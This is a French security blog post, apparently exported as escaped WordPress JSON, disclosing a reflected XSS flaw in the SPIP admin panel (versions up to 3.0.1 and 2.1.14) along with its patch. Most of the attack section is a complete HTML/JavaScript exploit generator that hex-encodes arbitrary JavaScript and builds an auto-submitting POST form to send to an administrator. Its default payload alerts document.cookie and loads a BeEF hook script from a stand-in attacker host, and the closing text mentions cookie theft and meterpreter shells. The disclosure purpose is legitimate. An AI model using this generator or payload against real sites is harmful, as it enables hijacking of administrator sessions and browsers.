SPIP est un syst\u00e8me de publication pour l\u2019Internet qui s\u2019attache particuli\u00e8rement au fonctionnement collectif, au multilinguisme et \u00e0 la facilit\u00e9 d\u2019emploi. C\u2019est un logiciel libre, distribu\u00e9 sous la licence GNU\/GPL. Il peut ainsi \u00eatre utilis\u00e9 pour tout site Internet, qu\u2019il soit associatif ou institutionnel, personnel ou marchand.<\/p>\n<\/blockquote>\n
ASafety a d\u00e9cel\u00e9 une de ces XSS (non-permanente) et pr\u00e9venu l’\u00e9quipe en charge du d\u00e9veloppement de SPIP le 07\/06\/2012. Suite \u00e0 quelques \u00e9changes, un patch correctif d\u00e9bouchant sur une nouvelle release<\/em> est sorti ce jour m\u00eame.<\/p>\n alert(cookie);<\/p><\/div>\n La vuln\u00e9rabilit\u00e9 concerne le fichier “\/spip\/ecrire\/inc\/admin.php”, au niveau de la ligne 176 correspondante \u00e0 la fonction :<\/p>\n [php]function copy_request($script, $suite, $submit=”)&lt;br \/&gt; Les donn\u00e9es GET et POST sont nettoy\u00e9es \u00e0 partir de la fonction “entites_html()”, toutefois le nom de ces valeurs ($n) ne l’est pas, et est r\u00e9inject\u00e9 au sein du formulaire g\u00e9n\u00e9r\u00e9. Il est ainsi possible de cr\u00e9er un vecteur d’attaque XSS pour ces noms.<\/p>\n Les navigateurs actuels nettoient et convertissent certains caract\u00e8res des URLs automatiquement. Ainsi, l’injection de l’XSS est plus difficile \u00e0 r\u00e9aliser au sein de variables GET. C’est pourquoi la d\u00e9monstration suivante s’oriente vers la m\u00e9thode POST. ASafety a cr\u00e9\u00e9 un g\u00e9n\u00e9rateur d’exploit pour cette XSS. Le code du g\u00e9n\u00e9rateur est le suivant :<\/p>\n [html]&lt;br \/&gt; G\u00e9n\u00e9rateur d'XSS SPIP<\/p><\/div>\n L’objectif, au travers de ce g\u00e9n\u00e9rateur, est d’injecter le vecteur XSS au sein de l’attribut “name” de la balise “input” g\u00e9n\u00e9r\u00e9e par la fonction pr\u00e9c\u00e9dente. Ainsi, il faut clore convenablement l’attribut et la balise pour injecter le code de l’XSS. Les quote et double-quote sont par cons\u00e9quent \u00e0 restreindre au sein du code JS inject\u00e9, d’o\u00f9 le g\u00e9n\u00e9rateur d’exploit. A noter que la variable GET permettant l’acc\u00e8s \u00e0 la page d’administration vuln\u00e9rable a \u00e9volu\u00e9 au cours des versions de SPIP.<\/p>\n Le g\u00e9n\u00e9rateur pr\u00e9c\u00e9dent lanc\u00e9 au sein d’un navigateur demande l’URL du SPIP cible, la version de celui-ci, et le code JS \u00e0 injecter. Le g\u00e9n\u00e9rateur fourni en retour un code automatiquement g\u00e9n\u00e9r\u00e9 qu’un potentiel attanquant pourrait int\u00e9grer \u00e0 une quelconque page web en ligne.<\/p>\n Par la suite, si un administrateur du SPIP venait \u00e0 aller sur la page de l’attaquant, le code de l’XSS serait automatiquement ex\u00e9cut\u00e9. Source inject\u00e9e<\/p><\/div>\n Cette vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 test\u00e9e avec succ\u00e8s sur Firefox 13 mais s’av\u00e8re non-fonctionnelle sous Chrome, et n\u00e9cessite la directive “magic_quote_gcp” d’Apache de d\u00e9sactiv\u00e9e.<\/p>\n Nous vous invitons donc sans plus attendre \u00e0 corriger cette faiblesse en mettant \u00e0 jour votre version de SPIP via les modifications suivantes :<\/p>\n Ou bien d’utiliser la derni\u00e8re version t\u00e9l\u00e9chargeable ici<\/a> !<\/p>\n Beaucoup de CMS et d’applications web ont acquis les m\u00e9canismes de s\u00e9curisation de leur donn\u00e9es entrantes (sanitization<\/em>). La plupart appliquent des proc\u00e9d\u00e9s de nettoyage afin de se prot\u00e9ger de telles attaques. Or il est courant de voir les noms des variables, \u00e0 d\u00e9faut des valeurs, ne pas \u00eatre s\u00e9curis\u00e9s.<\/p>\n Nous remercions l’\u00e9quipe de SPIP pour leur r\u00e9activit\u00e9 et pour le maintien de cet outil !<\/p>\n Cr\u00e9dits : x@s<\/strong><\/p>\n Liens connexes :<\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Une nouvelle version de SPIP vient de sortir aujourd’hui, pour chacune des branches du projet. Au menu, de nombreuses am\u00e9liorations, […]<\/p>\n","protected":false},"author":1337,"featured_media":1199,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[52,48,45,50,46,51,49,47,44,43,55,54,53],"class_list":["post-132","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vuln-exploit-poc","tag-admin-panel","tag-beef","tag-exploit","tag-firefox","tag-get","tag-magic_quote_gcp","tag-poc","tag-post","tag-sanitize","tag-spip","tag-spip-2-0-20","tag-spip-2-1-15","tag-spip-3-0-2"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/132","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=132"}],"version-history":[{"count":30,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/132\/revisions"}],"predecessor-version":[{"id":1648,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/132\/revisions\/1648"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1199"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=132"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=132"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"Alerte](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/xss1-alert_cookie.png\" "\\"Alert(cookie)\\"")
<\/a>
\n{&lt;br \/&gt;
\n include_spip(‘inc\/filtres’);&lt;\/p&gt;
\n&lt;p&gt; foreach(array_merge($_POST,$_GET) as $n =&amp;amp;gt; $c) {&lt;br \/&gt;
\n if (!in_array($n,array(‘fichier’,’exec’,’validation_admin’)) AND !is_array($c))&lt;br \/&gt;
\n $suite .= &amp;amp;quot;\\n&amp;amp;lt;input type=’hidden’ name=’$n’ value=’&amp;amp;quot; .&lt;br \/&gt;
\n entites_html($c) .&lt;br \/&gt;
\n &amp;amp;quot;’ \/&amp;amp;gt;&amp;amp;quot;;&lt;br \/&gt;
\n }&lt;br \/&gt;
\n return generer_form_ecrire($script, $suite, ”, $submit);&lt;br \/&gt;
\n}[\/php]<\/p>\n
\n&amp;amp;lt;html&amp;amp;gt;&lt;br \/&gt;
\n&amp;amp;lt;head&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;script&amp;amp;gt;&lt;br \/&gt;
\n function trim(s){&lt;br \/&gt;
\n return s.replace(\/\\r\\n|\\r|\\n|\\t\/g,”).replace(\/^\\s+\/g,”).replace(\/\\s+$\/g,”);&lt;br \/&gt;
\n }&lt;\/p&gt;
\n&lt;p&gt; function encodeToHex(s){&lt;br \/&gt;
\n var r=&amp;amp;quot;&amp;amp;quot;;&lt;br \/&gt;
\n var h;&lt;br \/&gt;
\n for(var c=0;c&amp;amp;lt;s.length;c++){&lt;br \/&gt;
\n h=s.charCodeAt(c).toString(16);&lt;br \/&gt;
\n while(h.length&amp;amp;lt;3) h=&amp;amp;quot;%&amp;amp;quot;+h;&lt;br \/&gt;
\n r+=h;&lt;br \/&gt;
\n }&lt;br \/&gt;
\n return r;&lt;br \/&gt;
\n }&lt;\/p&gt;
\n&lt;p&gt;function generateXSS(){&lt;br \/&gt;
\n var target = trim(document.getElementById(&amp;amp;quot;target&amp;amp;quot;).value);&lt;br \/&gt;
\n var version = trim(document.getElementById(&amp;amp;quot;version&amp;amp;quot;).value);&lt;br \/&gt;
\n var content = trim(document.getElementById(&amp;amp;quot;content&amp;amp;quot;).value);&lt;br \/&gt;
\n var resultjs = &amp;amp;quot;&amp;amp;quot;;&lt;br \/&gt;
\n resultjs += &amp;amp;quot;&amp;amp;lt;html&amp;amp;gt;&amp;amp;lt;body&amp;amp;gt;&amp;amp;lt;form name=’x’ action=’&amp;amp;quot; + target + &amp;amp;quot;ecrire\/?exec=&amp;amp;quot; + version + &amp;amp;quot;’ method=’post’&amp;amp;gt;&amp;amp;quot;;&lt;br \/&gt;
\n resultjs += &amp;amp;quot;&amp;amp;lt;input type=’hidden’ name=’exec’ value=’&amp;amp;quot; + version + &amp;amp;quot;’ \/&amp;amp;gt;&amp;amp;quot;;&lt;br \/&gt;
\n resultjs += &amp;amp;quot;&amp;amp;lt;input type=’hidden’ name=\\&amp;amp;quot;x’&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;eval(unescape(‘&amp;amp;quot; + encodeToHex(content) + &amp;amp;quot;’));&amp;amp;lt;\\\/script&amp;amp;gt;&amp;amp;lt;input=\\&amp;amp;quot; value=” \/&amp;amp;gt;&amp;amp;quot;;&lt;br \/&gt;
\n resultjs += &amp;amp;quot;&amp;amp;lt;\/form&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.forms[‘x’].submit();&amp;amp;lt;\\\/script&amp;amp;gt;&amp;amp;lt;\/body&amp;amp;gt;&amp;amp;lt;\/html&amp;amp;gt;&amp;amp;quot;;&lt;br \/&gt;
\n document.getElementById(&amp;amp;quot;resultjs&amp;amp;quot;).value = resultjs;&lt;br \/&gt;
\n }&lt;\/p&gt;
\n&lt;p&gt; &amp;amp;lt;\/script&amp;amp;gt;&lt;br \/&gt;
\n&amp;amp;lt;\/head&amp;amp;gt;&lt;br \/&gt;
\n&amp;amp;lt;body onload=&amp;amp;quot;generateXSS();&amp;amp;quot;&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;h2&amp;amp;gt;XSS in SPIP Core &amp;amp;amp;lt;=3.0.1 or &amp;amp;amp;lt;=2.1.14 admin panel (base repair)&amp;amp;lt;\/h2&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;p&amp;amp;gt;&lt;br \/&gt;
\n This XSS, non-persistent, use POST vars through admin panel.&amp;amp;lt;br \/&amp;amp;gt;&lt;br \/&gt;
\n The target is the attribute &amp;amp;quot;name&amp;amp;quot; of an input markup hidden.&amp;amp;lt;br \/&amp;amp;gt;&lt;br \/&gt;
\n This XSS work on Firefox 13, IE7, but doesn’t work on Chrome.&amp;amp;lt;br \/&amp;amp;gt;&lt;br \/&gt;
\n Magic_quote_gcp = Off needed.&lt;br \/&gt;
\n &amp;amp;lt;\/p&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;form action=&amp;amp;quot;&amp;amp;quot; onsubmit=&amp;amp;quot;generateXSS();return false;&amp;amp;quot;&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;table&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;URL’s SPIP Targeted :&amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;&amp;amp;lt;input id=&amp;amp;quot;target&amp;amp;quot; type=&amp;amp;quot;text&amp;amp;quot; value=&amp;amp;quot;http:\/\/target\/spip\/&amp;amp;quot; size=&amp;amp;quot;70&amp;amp;quot; onkeyup=&amp;amp;quot;generateXSS();&amp;amp;quot; \/&amp;amp;gt;&amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;SPIP version :&amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;select id=&amp;amp;quot;version&amp;amp;quot; onchange=&amp;amp;quot;generateXSS();&amp;amp;quot;&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;option value=&amp;amp;quot;base_repair&amp;amp;quot;&amp;amp;gt;3.0.X (up to 3.0.1 included)&amp;amp;lt;\/option&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;option value=&amp;amp;quot;admin_repair&amp;amp;quot;&amp;amp;gt;2.1.X (up to 2.1.14 included)&amp;amp;lt;\/option&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/select&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;JavaScript code to execute :&amp;amp;lt;br \/&amp;amp;gt;(without &amp;amp;amp;lt;script&amp;amp;amp;gt; &amp;amp;amp; &amp;amp;amp;lt;\/script&amp;amp;amp;gt; markup)&amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;textarea cols=&amp;amp;quot;70&amp;amp;quot; rows=&amp;amp;quot;10&amp;amp;quot; id=&amp;amp;quot;content&amp;amp;quot; onkeyup=&amp;amp;quot;generateXSS();&amp;amp;quot;&amp;amp;gt;&lt;br \/&gt;
\nalert(document.cookie);&lt;br \/&gt;
\nvar script = document.createElement(&amp;amp;quot;script&amp;amp;quot;);&lt;br \/&gt;
\nscript.type = &amp;amp;quot;text\/javascript&amp;amp;quot;;&lt;br \/&gt;
\nscript.src = &amp;amp;quot;http:\/\/ha.ck.er.xxx\/beEf.js&amp;amp;quot;;&lt;br \/&gt;
\ndocument.body.appendChild(script);&lt;br \/&gt;
\n &amp;amp;lt;\/textarea&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;Exploit to send to an admin : &amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;textarea cols=&amp;amp;quot;70&amp;amp;quot; rows=&amp;amp;quot;10&amp;amp;quot; id=&amp;amp;quot;resultjs&amp;amp;quot; readonly=&amp;amp;quot;readonly&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;\/textarea&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/td&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/table&amp;amp;gt;&lt;br \/&gt;
\n &amp;amp;lt;\/form&amp;amp;gt;&lt;br \/&gt;
\n&amp;amp;lt;\/body&amp;amp;gt;&lt;br \/&gt;
\n&amp;amp;lt;\/html&amp;amp;gt;[\/html]<\/p>\n<\/a>
\nLes XSS sont des vuln\u00e9rabilit\u00e9s \u00e0 ne pas d\u00e9laisser. Dans cet exemple, il est possible d’usurper le cookie d’un administrateur, de sa session, d’exploiter la puissance du framework<\/em> BeEF<\/a>, d’injecter des exploits pour l’obtention de shell, meterpreter et bien d’autres possibilit\u00e9s…<\/p>\n<\/a>\n
\n